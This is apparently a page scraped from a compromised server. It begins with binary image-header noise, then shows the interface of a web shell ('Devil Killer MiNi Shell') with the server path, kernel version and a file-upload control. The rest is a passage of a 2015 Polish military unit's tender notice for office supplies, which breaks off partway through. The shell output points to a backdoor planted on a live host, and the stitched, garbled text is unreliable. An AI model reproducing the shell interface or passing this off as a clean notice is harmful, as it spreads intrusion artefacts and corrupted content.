JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150703/99451-N-2015.html

<p class="kh_header"><b>Kraków: Zakup i dostawa artykułów biurowych.</b><br>
<b>Numer ogłoszenia: 99451 - 2015; data zamieszczenia: 03.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4724 , ul. Tyniecka 45, 30-901 Kraków, woj. małopolskie, tel. 261 132 569, faks 261 132 510.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa artykułów biurowych.Zadanie nr 1 - zakup i dostawa artykułów biurowych - Nr 1 (JW 4724).Zadanie nr 2 - zakup i dostawa artykułów biurowych - Nr 2 (JW 4724).Zadanie nr 3 - zakup i dostawa artykułów biurowych - Nr 3 (JW 4724).Zadanie nr 4 - zakup i dostawa artykułów biurowych - Nr 4 (Klub DSS).Zadanie nr 5 - zakup i dostawa artykułów biurowych - Nr 5 (Klub DSS).Zadanie nr 6 - zakup i dostawa artykułów biurowych - Nr 6 (Klub DSS).Zadanie nr 7 - zakup i dostawa artykułów biurowych - Nr 7 (COS-DKWS).Zadanie nr 8 - zakup i dostawa artykułów biurowych - Nr 8 (COS-DKWS).Zadanie nr 9 - zakup i dostawa artykułów biurowych - Nr 9 (COS-DKWS).Zadanie nr 10 - zakup i dostawa artykułów biurowych - Nr 10 (JW 3940).Zadanie nr 11 - zakup i dostawa artykułów biurowych - Nr 11 (JW 3940).Zadanie nr 12 - zakup i dostawa artykułów biurowych - Nr 12 (JW 3940)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.25-3, 30.19.21.21-5, 30.19.21.00-2, 30.19.21.32-5, 30.19.21.60-0, 30.23.74.30-2, 30.19.00.00-7, 30.19.21.30-1, 30.19.21.11-2, 30.19.57.00-9, 22.60.00.00-6, 30.19.21.33-2, 30.23.74.30-2, 30.19.91.00-1, 30.19.29.30-9, 22.81.60.00-3, 22.81.63.00-6, 22.00.00.00-0, 30.19.28.00-9, 42.99.42.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy przed podpisaniem umowy, w wysokości 2% wartości brutto realizowanego zadania (zaokrąglona do pełnych złotych).Oryginał dokumentu zabezpieczenia należytego wykonania umowy w formie niepieniężnej (określonej w art. 148 ust. 1 pkt 2 - 5 ustawy Pzp) Wykonawca ma obowiązek zdeponować w kasie Zamawiającego przed terminem podpisania umowy, a kopię dokumentu zabezpieczenia należytego wykonania umowy złożyć w Sekcji Zamówień Publicznych (kasa jest czynna od poniedziałku do piątku w godzinach 8.00 - 10.00 oraz 12.00 - 14.00).W przypadku wyboru Wykonawcy na realizację więcej niż jednego zadania, umowa będzie podpisana na każde zadanie oddzielnie. Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy dla każdego zadania oddzielnie z wyszczególnieniem, którego zadania wpłacone zabezpieczenie dotyczy.Zamawiający zwróci zabezpieczenie należytego wykonania umowy w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać mogą się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - z dnia 29 stycznia 2004r. - Prawo zamówień publicznych /tekst jednolity: Dz. U. z 2013r., poz. 907  z późn. zm./ (druk oświadczenia, który należy wypełnić jest załącznikiem Nr 2 do specyfikacji),a także warunki określone w specyfikacji istotnych warunków zamówienia.Opis sposobu dokonywania oceny spełnienia tego warunku.Ocena spełniania przez Wykonawcę warunków, o których mowa w niniejszej specyfikacji nastąpi na podstawie załączonych do oferty dokumentów (wg zasady spełnia-nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać mogą się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - z dnia 29 stycznia 2004r. - Prawo zamówień publicznych /tekst jednolity: Dz. U. z 2013r., poz. 907  z późn. zm./ (druk oświadczenia, który należy wypełnić jest załącznikiem Nr 2 do specyfikacji),a także warunki określone w specyfikacji istotnych warunków zamówienia.Opis sposobu dokonywania oceny spełnienia tego warunku.Ocena spełniania przez Wykonawcę warunków, o których mowa w niniejszej specyfikacji nastąpi na podstawie załączonych do oferty dokumentów (wg zasady spełnia-nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać mogą się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - z dnia 29 stycznia 2004r. - Prawo zamówień publicznych /tekst jednolity: Dz. U. z 2013r., poz. 907  z późn. zm./ (druk oświadczenia, który należy wypełnić jest załącznikiem Nr 2 do specyfikacji),a także warunki określone w specyfikacji istotnych warunków zamówienia.Opis sposobu dokonywania oceny spełnienia tego warunku.Ocena spełniania przez Wykonawcę warunków, o których mowa w niniejszej specyfikacji nastąpi na podstawie załączonych do oferty dokumentów (wg zasady spełnia-nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać mogą się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - z dnia 29 stycznia 2004r. - Prawo zamówień publicznych /tekst jednolity: Dz. U. z 2013r., poz. 907  z późn. zm./ (druk oświadczenia, który należy wypełnić jest załącznikiem Nr 2 do specyfikacji),a także warunki określone w specyfikacji istotnych warunków zamówienia. Opis sposobu dokonywania oceny spełnienia tego warunku. Ocena spełniania przez Wykonawcę warunków, o których mowa w niniejszej specyfikacji nastąpi na podstawie załączonych do oferty dokumentów (wg zasady spełnia-nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać mogą się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - z dnia 29 stycznia 2004r. - Prawo zamówień publicznych /tekst jednolity: Dz. U. z 2013r., poz. 907  z późn. zm./ (druk oświadczenia, który należy wypełnić jest załącznikiem Nr 2 do specyfikacji),a także warunki określone w specyfikacji istotnych warunków zamówienia. Opis sposobu dokonywania oceny spełnienia tego warunku. Ocena spełniania przez Wykonawcę warunków, o których mowa w niniejszej specyfikacji nastąpi na podstawie załączonych do oferty dokumentów (wg zasady spełnia-nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Osoby nie posiadające obywatelstwa polskiego powinny uzyskać pozwolenie na wejście na teren JW 4724, które uzyskuje się na wniosek skierowany do Dowódcy JW 4724 na 14 dni przed terminem wejścia na teren JW 4724,celem przeprowadzenia stosowne j procedury. Wejście obcokrajowców na tereny chronione odbywa się ze stosownym pozwoleniem zgodnie z decyzją Nr 21/MON Ministra Obrony Narodowej z dnia 10 lutego 2012 r. w sprawie planowania i realizowania przedsięwzięć współpracy międzynarodowej w resorcie obrony narodowej (Dz. Urz. Mon poz. 33).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jw4724.wp.mil.pl oraz bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać na wniosek przesłany pisemnie na adres: Jednostka Wojskowa Nr 4724; ul. Tyniecka 45; 30 - 901 Kraków lub pod numer fax: 261 132 510, adres e-mail: jw4724.przetargi@wp.mil.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2015 godzina 12:00, miejsce: JW Nr 4724; ul. Tyniecka 45; 30 - 901 Kraków w kancelarii jawnej w godz. 8.00 - 15.00. Należy uwzględnić czas związany z procedurami pozwalającymi na wejście na teren JW..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - zakup i dostawa artykułów biurowych - Nr 1 (JW 4724)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - zakup i dostawa artykułów biurowych - Nr 1 (JW 4724). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach o SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.25-3, 30.19.21.21-5, 30.19.21.00-2, 30.19.21.32-5, 30.12.92.16-0, 30.23.74.30-2, 30.19.00.00-7, 30.19.21.30-1, 30.19.21.11-2, 30.19.57.00-9, 22.60.00.00-6, 30.19.21.33-2, 30.23.74.30-2, 30.19.91.00-1, 30.19.29.30-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - zakup i dostawa artykułów biurowych - Nr 2 (JW 4724)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - zakup i dostawa artykułów biurowych - Nr 2 (JW 4724). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 22.81.60.00-3, 22.81.63.00-6, 22.00.00.00-0, 30.19.28.00-9, 42.99.42.20-8, 24.91.00.00-6, 30.19.71.10-0, 30.19.93.10-6, 30.19.00.00-7, 30.19.25.00-6, 22.99.00.00-6, 22.80.00.00-8, 30.19.95.00-5, 22.85.00.00-3, 39.24.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - zakup i dostawa artykułów biurowych - Nr 3 (JW 4724)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - zakup i dostawa artykułów biurowych - Nr 3 (JW 4724). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.71.00-7, 39.54.11.30-6, 30.19.72.20-4, 44.42.42.00-0, 30.19.71.00-7, 42.99.42.30-1, 30.19.59.00-1, 30.19.56.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - zakup i dostawa artykułów biurowych - Nr 4 (Klub DSS).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 - zakup i dostawa artykułów biurowych - Nr 4 (Klub DSS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 37.82.24.00-0, 30.19.00.00-7, 30.19.92.30-1, 30.19.95.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - zakup i dostawa artykułów biurowych - Nr 5 (Klub DSS)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 - zakup i dostawa artykułów biurowych - Nr 5 (Klub DSS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.50-7, 37.82.24.00-0, 30.19.21.30-1, 44.81.23.00-8, 30.19.00.00-7, 39.22.42.10-3, 44.81.23.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - zakup i dostawa artykułów biurowych - Nr 6 (Klub DSS)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 - zakup i dostawa artykułów biurowych - Nr 6 (Klub DSS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach o SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 44.17.40.00-0, 30.19.73.00-9, 30.19.56.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - zakup i dostawa artykułów biurowych - Nr 7 (COS-DKWS)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7 - zakup i dostawa artykułów biurowych - Nr 7 (COS-DKWS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.25-3, 30.19.21.21-5, 30.19.21.60-0, 30.19.29.30-9, 30.19.21.60-0, 39.29.25.00-0, 30.19.21.31-8, 30.19.21.30-1, 30.19.21.11-2, 22.60.00.00-6, 30.19.21.33-2, 30.19.21.32-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - zakup i dostawa artykułów biurowych - Nr 8 (COS-DKWS)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 - zakup i dostawa artykułów biurowych - Nr 8 (COS-DKWS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 22.81.63.00-6, 22.81.60.00-3, 30.19.28.00-9, 24.91.00.00-6, 30.19.71.10-0, 44.61.71.00-9, 39.29.25.00-0, 22.80.00.00-8, 30.19.95.00-5, 39.54.11.30-6, 30.19.72.20-4, 30.19.72.21-1, 44.42.42.00-0, 30.19.71.00-7, 30.19.93.10-6, 42.99.42.20-8, 22.99.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - zakup i dostawa artykułów biurowych - Nr 9 (COS-DKWS)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 - zakup i dostawa artykułów biurowych - Nr 9 (COS-DKWS). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
